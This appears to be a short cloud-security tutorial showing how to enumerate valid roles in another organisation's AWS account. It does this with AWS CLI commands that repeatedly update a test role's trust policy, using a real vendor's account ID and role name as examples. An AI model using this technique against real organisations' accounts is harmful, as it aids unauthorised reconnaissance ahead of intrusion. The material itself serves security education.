This only works when you already know the victim's account ID. For this example, let's say that the victim account ID is 999988887777.

Create a test role

First, create a role that we can use for this demo. This role is in your own account.

aws iam create-role --role-name test-enumeration \
    --assume-role-policy-document '{"Version": "2012-10-17","Statement": [{"Effect": "Allow","Principal": {"Service": "ec2.amazonaws.com"},"Action": "sts:AssumeRole"}]}'

Test case 1: Invalid Account ID (999988887777)

aws iam update-assume-role-policy --role-name test-enumeration \
    --policy-document '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::999988887777:user/invalid"},"Action": "sts:AssumeRole"}]}'

Test case 2: Valid Account ID (754728514883), Invalid role name (invalid)

Let's use New Relic's well-known account ID for this test.

aws iam update-assume-role-policy --role-name test-enumeration \
    --policy-document '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::754728514883:role/invalid"},"Action": "sts:AssumeRole"}]}'

Test case 3: Valid Account ID (754728514883), Valid Role name (NewRelicInfrastructure-Integrations)

Let's use New Relic's well-known account ID (754728514883) and role name (NewRelicInfrastructure-Integrations) for this test.

aws iam update-assume-role-policy --role-name test-enumeration \
    --policy-document '{"Version": "2012-10-17", "Statement": [{"Effect": "Allow", "Principal": {"AWS": "arn:aws:iam::754728514883:role/NewRelicInfrastructure-Integrations"},"Action": "sts:AssumeRole"}]}'

Example

(demo screenshot: image not preserved in this copy)

References

New Relic Account ID and role name details were found here:
